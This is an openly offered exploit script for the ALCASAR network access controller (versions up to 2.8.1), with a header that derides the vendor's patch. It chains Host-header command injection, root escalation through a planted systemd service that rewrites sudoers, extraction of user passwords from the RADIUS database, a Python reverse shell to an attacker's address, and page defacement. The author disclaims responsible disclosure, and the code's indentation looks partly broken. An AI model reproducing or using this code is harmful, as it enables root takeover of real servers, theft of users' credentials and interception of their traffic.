#!/usr/bin/env python
# -*- coding: utf-8 -*-
#ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability
#Author: eF
#Date: 2014-09-12
#URL : http://www.alcasar.net/
#This is not a responsible disclosure coz' I have no sense of ethics and I don't give a f*ck.
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# ALCASAR is a free Network Access Controller which controls the Internet consultation networks.
# It authenticates, attributes and protects users' access regardless their connected equipment
# (PC, smartphone, game console, etc.).
# I recently released an exploit for ALCASAR 2.8 (ALCASAR <= 2.8 Remote Code Execution Vulnerability Root).
# As a reminder, it was a trivial code execution via a unfiltered exec() call:
# $pattern = preg_replace('/www./','',$_SERVER['HTTP_HOST']);
# exec("grep -Re ^$pattern$ /etc/dansguardian/lists/blacklists/*/domains|cut -d'/' -f6", $output);
# A few days later, a new version corrects the vulnerability. Or maybe not...
# At first, this is how ALCASAR's developers present the previous vulnerability:
# " A security hole has been discovered on ALCASAR V2.8 (only this version). This vulnerability allows a user "
# " connected on the LAN to retrieve a lot of data from the server. The ALCASAR team is testing few security"
# " patches. A script that you could run on the active servers will be available on this forum ASAP. At that"
# " time, the download version of ALCASAR will be incremented (V2.8.1) "
# ?!? This vulnerability allows a user connected on the LAN to *TOTALLY PWN* the server:
# Get a root shell, stop all services, sniff all connections, inject data in users' sessions, sniff passwords,
# bypass firewall rules, act as another user, etc.
# This is not just a matter of "retrieving a lot of data from the server".
# Not to alert users of real criticality of a vulnerability is a very serious lack of security.
# Lying by saying that the vulnerability only affects version 2.8 while it also affects version 2.7 is another
# one.
# Now, the patch itself: it tries to correct the vulnerability by filtering the vulnerable input:
# $pattern = filter_var($pattern, FILTER_VALIDATE_URL) == false ? "" : $pattern;
# WTF?!
# First, I think that the application no longer works. By default, filter_var() is going to accept an URL
# only if its scheme is valid:
# $ php -r 'var_dump(filter_var("www.google.com", FILTER_VALIDATE_URL));'
# bool(false)
# $ php -r 'var_dump(filter_var("http://www.google.com", FILTER_VALIDATE_URL));'
# string(21) "http://www.google.com"
# But... we cannot put http:// in the HTTP host field, the HTTP server won't let us...
# Dev, did you try your patch?
# Instead, to execute code, it's quite easy to bypass this filtering using "mailto:email@valid.tld;cmd;"
# Service down, vulnerability still present: double fail.
# The privilege escalation in the previous exploit was using openssl, to gain reading and writing rights
# as root.
# The patch therefore removes openssl in the sudoers file (without changing the legitimate
# calls in the PHP code...). So let's use another method: systemctl is still callable via sudo...
# We can create a service with our command and start it as root:
# sudo systemctl link /tmp/pwn3d.service
# sudo systemctl start pwn3d.service
# Conclusion: triple fail.
# Wouldn't a "responsable de la sécurité des systèmes d'information d'un grand commandement" need a
# little training on secure PHP development?
# On ALCASAR website:
# "The security of the portal has been worked out like a bastion in order to resist to different
# kinds of threat"
# LOLZ!!! Remote Root Code Execution does not seem to be part of these "different kinds of threat".
# ALCASAR is not built with security in mind. Apache user can sudo, there is no chroot, no separation,
# the PHP code is dreadful, some passwords are unnecessarily stored in plaintext, the function to
# generate user password is weak, there are no system updates (kernel is out to date, from Jul 4 2013),
# etc.
# Development is not really open either: there is no bugtracker, no trac, no way to see what has been
# patched, etc. If the elementary rules of open source development had been met, a user could have
# prevented this 2.8.1 patch from being crap.
import sys, os, re, httplib
class PWN_Alcasar:
def __init__(self, host):
self.host = host
self.root = False
def exec_cmd(self, cmd, output=False):
tag = os.urandom(4).encode('hex')
cmd = 'bash -c "%s" 2>&1' % cmd.replace('"', '\\"')
if self.root:
cmd = 'sudo %s' % cmd
wrapper = 'echo %s;echo %s|base64 -d -w0|sh|base64 -w0' % (tag, cmd.encode('base64').replace('\n',''))
wrapper = wrapper.replace(' ', '${IFS}')
headers = {
'host' : 'mailto:eF@cosmic.nato;%s;#' % wrapper
c = httplib.HTTPConnection(self.host)
c.request('GET', '/index.php', '', headers)
r = c.getresponse()
data = r.read()
m = re.search(r'%s, (.*)\s</div>' % tag, data)
if m:
data = m.group(1).decode('base64')
if output:
print data
return data
return None
def read_file(self, filepath, output=True):
return self.exec_cmd('cat "%s"' % filepath, output=output)
def read_passwords(self):
alcasar_mysql = self.read_file('/usr/local/sbin/alcasar-mysql.sh', output=False)
if alcasar_mysql:
m = re.search(r'radiuspwd="(.*)"', alcasar_mysql)
if m:
radiuspwd = m.group(1)
sql = 'SELECT username,value FROM radcheck WHERE attribute like \'%%password%%\''
self.exec_cmd('mysql -uradius -p\"%s\" radius -e "%s"' % (radiuspwd, sql), output=True)
def edit_sudoers(self):
service ='[Unit]\n'
service += 'Description=Just another ALCASAR lolcalr00t\n\n'
service += '[Service]\n'
service += 'Type=forking\n'
service += 'KillMode=process\n'
service += 'ExecStart=/bin/sh -c "sed -i s/BL,NF/BL,ALL,NF/g /etc/sudoers"\n'
self.exec_cmd('echo %s | openssl base64 -d -out /tmp/Pwn3d.service -A' % service.encode('base64').replace('\n', ''))
self.exec_cmd('sudo systemctl link /tmp/Pwn3d.service')
self.exec_cmd('sudo systemctl start Pwn3d.service')
if exploit.exec_cmd('sudo id').find('uid=0') != -1:
self.root = True
def reverse_shell(self, rip, rport='80'):
payload = 'import socket,subprocess,os;'
payload += 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
payload += 's.connect((\'%s\',%s));' % (rip, rport)
payload += 'os.dup2(s.fileno(),0);'
payload += 'os.dup2(s.fileno(),1);'
payload += 'os.dup2(s.fileno(),2);'
payload += 'p=subprocess.call([\'/bin/sh\',\'-i\']);'
return self.exec_cmd('python -c "%s"' % payload)
def lolz(self):
old = 'http://www.wikipedia.org'
new = 'https://www.youtube.com/watch\?v=Q-J0f1yF75Y'
self.exec_cmd('sed -i s,%s,%s,g /var/www/html/index.php' % (old, new), True)
def usage():
print 'Usage: %s host command (ip) (port)' % sys.argv[0]
print ' "command" can be a shell command or "reverseshell"'
if __name__ == '__main__':
print '#' * 80
print '# ALCASAR <= 2.8.1 Remote Root Code Execution Vulnerability'
print '# Author: eF'
print '#' * 80
if len(sys.argv) < 3:
cmd = sys.argv[2]
if cmd == 'reverseshell':
if len(sys.argv) < 5:
print '[!] Need IP and port for the reverse shell...'
rip = sys.argv[3]
rport = sys.argv[4]
exploit = PWN_Alcasar(sys.argv[1])
print '[-] whoami (should be apache):'
exploit.exec_cmd('id', output=True)
print '[+] On the way to the uid 0...'
print '[-] Got root?'
exploit.exec_cmd('id', output=True)
if exploit.root:
print '[+] Here are some passwords for you (again):'
if cmd == 'reverseshell':
print '[+] You should now have a shell on %s:%s' % (rip, rport)
exploit.reverse_shell(rip, rport)
print '[+] Your command Sir:'
exploit.exec_cmd(cmd, output=True)